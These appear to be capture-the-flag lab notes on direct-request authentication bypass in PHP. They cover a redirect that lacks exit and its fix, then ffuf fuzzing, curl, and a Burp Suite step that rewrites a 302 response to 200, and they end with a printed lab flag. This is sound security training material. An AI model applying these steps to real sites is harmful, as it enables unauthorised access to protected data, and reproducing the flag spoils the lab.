this is the most straightforward way of bypassing authentication checks. this method requests the protected resource directly from an unauthenticated context. the attacker then accesses the protected information if the web application does not properly verify that the request is authenticated.
#original vulnerable php code
#This code redirects the user to /index.php if the session is not active (user is not authenticated). However, the PHP script does not stop execution after sending the header, so the protected information further down the page is still sent in the body of the redirect response
// Vulnerable pattern: the Location header is set, but execution falls through
// past the if-block, so the rest of the page (the protected content) is still
// rendered into the body of the 302 response.
if(!$_SESSION['active']) {
header("Location: index.php");
// no exit here -> the script keeps running after the redirect header
}
#mitigation
#To prevent the protected information from being returned in the body of the redirect response, the PHP script needs to exit immediately after issuing the redirect header
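// Mitigated pattern: redirect unauthenticated users and stop execution so that
// nothing below this block is emitted into the response body.
// empty() behaves like !$_SESSION['active'] for any set value but also covers
// the case where the key was never set, without raising an undefined-index
// notice/warning. (Assumes session_start() has already been called and no
// output has been sent yet, otherwise header() cannot take effect.)
if (empty($_SESSION['active'])) {
header("Location: index.php");
exit; // required: a redirect header alone does not stop the script
}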
#
root@oco:~$ locate web-extension*
/usr/share/seclists/Discovery/Web-Content/web-extensions.txt
root@oco:~$ cp /usr/share/seclists/Discovery/Web-Content/web-extensions.txt .
#identify the extension the site uses
root@oco:~$ ffuf -w web-extensions.txt:FUZZ -u http://94.237.62.184:39910/indexFUZZ
* .php [Status: 200, Size: 2971, Words: 638, Lines: 97, Duration: 4328ms]
root@oco:~$ locate *directory-list*
root@oco:~$ cp /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt .
#fuzz for admin pages, etc
root@oco:~$ ffuf -w directory-list-2.3-small.txt:FUZZ -u http://94.237.62.184:39910/FUZZ.php -t 100 -ic
admin [Status: 302, Size: 14465, Words: 4165, Lines: 429, Duration: 77ms]
* the output may list different sizes for each hit
- size 0 means no content or an empty page
- size > 0 means the page contains content; a 302 redirect with a large size (like admin.php above) is the tell-tale sign that protected content is still being sent in the body of the redirect response
#verify identified pages
root@oco:~$ curl http://94.237.62.184:39910/admin.php
#intercept requests and test for direct access authentication bypass
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
BURP > Proxy > Requests > right-click > Do intercept > Response to this request > Forward
Request
...
GET /admin.php HTTP/1.1
Host: 94.237.62.184:39910
Cookie: PHPSESSID=e4b4gmh75rbp9k90n2l23rfv39
Connection: close
BURP > Proxy > Response > Forward
Response
...
HTTP/1.1 302 Found // change this to 200 OK
Date: Wed, 25 Dec 2024 19:13:30 GMT
Server: Apache/2.4.59 (Debian)
Location: index.php
Connection: close
Modifications...
HTTP/1.1 200 OK
root@oco:~$ BROWSER > http://94.237.62.184:39910/admin.php
* HTB{913ab2d84b8db21854c696dee1f1db68}